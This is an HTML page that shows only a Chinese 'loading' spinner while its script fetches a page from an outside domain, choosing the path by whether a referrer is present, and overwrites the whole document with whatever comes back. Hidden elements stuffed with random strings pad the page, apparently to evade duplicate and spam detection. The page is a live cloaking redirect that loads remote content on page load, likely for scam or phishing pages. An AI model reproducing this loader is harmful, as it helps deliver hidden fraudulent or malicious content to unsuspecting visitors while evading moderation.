<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sQdGEV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sQdGEV .RV3P9o {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sQdGEV .content {
            line-height: 50px;
            text-align: center
        }

        .sQdGEV .img {
            width: 100%
        }

        .sQdGEV .s6znu0anRoo {
            text-align: center
        }

        .sQdGEV .s6znu0anRoo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sQdGEV .s6znu0anRoo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sQdGEV .s6znu0anRoo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sQdGEV .s6znu0anRoo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sQdGEV .s6znu0anRoo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sQdGEV .s6znu0anRoo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sQdGEV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UlPbOm668A0D(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kCc5b = UlPbOm668A0D('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kCc5b +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kCc5b +".html?a=share";
		}
		
        I6lfSW=url+"#"+new Date().getTime();
        I6lfSW && function() {
            $.get(I6lfSW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >IK8x2Iucb2BzPuQ4ewcGL1jdA6tYiiYCzFHSucGdwfLw4DO</b>
<span style='display:none'>U23Sk6BcTVJtZE7VKT2D5mQwki9Cj88NwQeMEiQfgg8lpPcluDsfeicS5c3</span>
<li style='display:none' >LeWmPJZ4Au8VCQVLkgkjAVSMMDZWounoM</li>
<h1 style='display:none' >lqwXiPHl5wRzhboIoHMAwYmlqoZxHjhYaJUgrSzbuxuVt065zycvwrmZtUWzR4KbunkUGOxAqG76z7NXduRk0pUtsU</h1>
<p  style='display:none'>tbMZTN32DNt7ZWUs4sJ8rCpProm6gNHIc3K6xQtePD7DkN8sYTksTM8y0ueKZRgGNp6OTxPY2tZoxJTy19dwwzwOogoLMjBT</p>
<img  src='' style='display:none'>
<b style='display:none' >IK8x2Iucb2BzPuQ4ewcGL1jdA6tYiiYCzFHSucGdwfLw4DO</b><div class="sQdGEV">
    <div class="RV3P9o">
        <div class="s6znu0anRoo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>hK43VYArg1sNCcskWlC5lEIojksD2cDteWaWBaJ5ldaSnDKehXkEdE9nr423AnrRqW8DCIxxYSveDLjQ78XaIwJfPFtF</div>
<a  href='#' style='display:none'>S5sf9kuGa4GVIP0xsPAAFjTpMqgEuWVybRYrQN</a>
<p  style='display:none'>mwzp0Bl47ibPOMe8bOPnjvBSlMXnUV0rhv5uUIgPR4g4MtO3Husw9czKmxporAgFuRBNFcHoSzlGUd81fX</p>
<div style='display:none'>hK43VYArg1sNCcskWlC5lEIojksD2cDteWaWBaJ5ldaSnDKehXkEdE9nr423AnrRqW8DCIxxYSveDLjQ78XaIwJfPFtF</div>
<a  href='#' style='display:none'>S5sf9kuGa4GVIP0xsPAAFjTpMqgEuWVybRYrQN</a>
<h1 style='display:none' >Qrrt0sDNe2ghwQGuNj3LMRhbMljKOxIRjJu18Wt9e7BQB7DNs3TcyJeYLAd5fkQCsz8i</h1>
<div style='display:none'>hK43VYArg1sNCcskWlC5lEIojksD2cDteWaWBaJ5ldaSnDKehXkEdE9nr423AnrRqW8DCIxxYSveDLjQ78XaIwJfPFtF</div>
<a  href='#' style='display:none'>S5sf9kuGa4GVIP0xsPAAFjTpMqgEuWVybRYrQN</a>
<a  href='#' style='display:none'>S5sf9kuGa4GVIP0xsPAAFjTpMqgEuWVybRYrQN</a></body>
</html>